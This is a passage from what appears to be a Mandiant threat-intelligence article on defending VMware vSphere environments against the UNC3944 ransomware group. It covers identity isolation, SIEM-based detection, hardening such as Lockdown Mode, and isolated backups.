Enforce phishing-resistant MFA everywhere: This must be applied to VPN, vCenter logins, and all privileged AD accounts. Use hardened PAWs with exclusive, firewalled access to vCenter.
Isolate critical identity infrastructure: Run your Tier 0 assets (Domain Controllers, PAM, Veeam, etc.) in a dedicated, highly secured “identity cluster” with its own stringent access policies, segregated from general-purpose workloads.
Avoid authentication loops: A critical architectural flaw is hosting identity providers (AD), recovery systems (Veeam), or privileged access management (PAM) solutions on the very virtualization platform they secure and authenticate. A compromise of the underlying ESXi hosts results in a correlated failure of both the dependent services and the means to restore them, a scenario that significantly complicates or prevents disaster recovery.
Consider alternate identity providers (IdPs): To break the “AD-to-everything” chain, consider using a separate, cloud-native IdP such as Microsoft Entra ID for authenticating to infrastructure.
Pillar 3: Advanced Detection and Recovery (Your Safety Net)
Build detections after hardening: The most effective alerts are those that detect the attempted manipulation of the hardening controls you’ve put in place. Harden first, then build your detection logic.
Centralize and monitor key logs: Forward all logs from AD, vCenter, ESXi, networking infrastructure, firewalls, and backups to a SIEM. Correlate logs from these disparate sources to create high-fidelity detection scenarios that can spot the threat actors’ methodical movements.
Focus on high-fidelity alerts: Prioritize alerting on events in phases 1-3. Detecting the enablement of SSH on a host, a VCSA takeover, or membership changes to your “Veeam Admins” group will enable you to act before data exfiltration and ransomware deployment.
Architect for survival: Assume the worst-case scenario. Your immutable and air-gapped backups are your last line of defense. They must be isolated from your production AD and inaccessible to a compromised administrator. Test your recovery plan against this specific threat model to ensure it works.
Conclusion: The Defender’s Mandate — Harden and Alert
UNC3944’s playbook requires a fundamental shift in defensive strategy, moving from EDR-based threat hunting to proactive, infrastructure-centric defense. This threat differs from traditional Windows ransomware in two ways: speed and stealth. While traditional actors may have a dwell time of days or even weeks for reconnaissance, UNC3944 operates with extreme velocity; the entire attack chain from initial access to data exfiltration and final ransomware deployment can occur in mere hours. This combination of speed and minimal forensic evidence makes it essential to not just identify but to immediately intercept suspicious behavioral patterns before they can escalate into a full-blown compromise.
This living-off-the-land (LotL) approach is so effective because the vCenter Server Appliance and ESXi hypervisor cannot run traditional EDR agents, leaving a significant visibility gap at the virtualization layer. Consequently, sophisticated detection engineering within your SIEM becomes the primary and most essential method for active defense.
This reality presents the most vital lesson for defenders: the ability to detect and act on early alerting is paramount. An alert generated during the final ransomware execution is merely a notification of a successful takeover. In contrast, an alert that triggers when the threat actor first compromises a help desk account or accesses vCenter from an unusual location is an actionable starting point for an investigation—a crucial window of opportunity to evict the threat before they achieve complete administrative control.
A resilient defense, therefore, cannot rely on sifting through a sea of broad, noisy alerts. This reactive approach is particularly ineffective when, as is often the case, many vSphere environments are built upon a foundation of insecure defaults—such as overly permissive roles or enabled SSH—and suffer from a lack of centralized logging visibility from ESXi hosts and vCenter. Without the proper context from these systems, a security team is left blind to the threat actors’ methodical, LotL movements until it is far too late.
Instead, the strategy must be twofold. First, it requires proactive, defense-in-depth technical hardening to systematically correct these foundational gaps and reduce the attack surface. Second, this must be complemented by a deep analysis of the threat actor’s tactics, techniques, and procedures (TTPs) to build the high-fidelity correlation rules and logging infrastructure needed to spot their earliest movements. This means moving beyond single-event alerts and creating rules that connect the dots between a help desk ticket, a password reset in Active Directory, and a subsequent anomalous login to vCenter.
These two strategies are symbiotic, creating a system where defense enables detection. Robust hardening is not just a barrier; it also creates friction for the threat actor, forcing them to attempt actions that are inherently suspicious. For example, when Lockdown Mode is enabled (hardening), a threat actor’s attempt to open an SSH session to an ESXi host will fail, but it will also generate a specific, high-priority event. The control itself creates the clean signal that a properly configured SIEM is built to catch.
For any organization with a critical dependency on vSphere, this is not a theoretical exercise. What makes this threat exceptionally dangerous is its ability to render entire security strategies irrelevant. It circumvents traditional tiering models by attacking the underlying hypervisor that hosts all of your virtualized Tier 0 assets—including Domain Controllers, Certificate Authorities, and PAM solutions—rendering the logical separation of tiering completely ineffective. Simultaneously, by manipulating virtual disks while the VMs are offline, it subverts in-guest security solutions—such as EDR, antivirus (AV), DLP, and host-based intrusion prevention systems (HIPS)—as their agents cannot monitor for direct ESXi-level changes.
The threat is immediate, and the attack chain is proven. Mandiant has observed that the successful hypervisor-level tactics leveraged by groups like UNC3944 are no longer exclusive; these same TTPs are now being actively adopted by other ransomware groups. This proliferation turns a specialized threat into a mainstream attack vector; the time to act is now.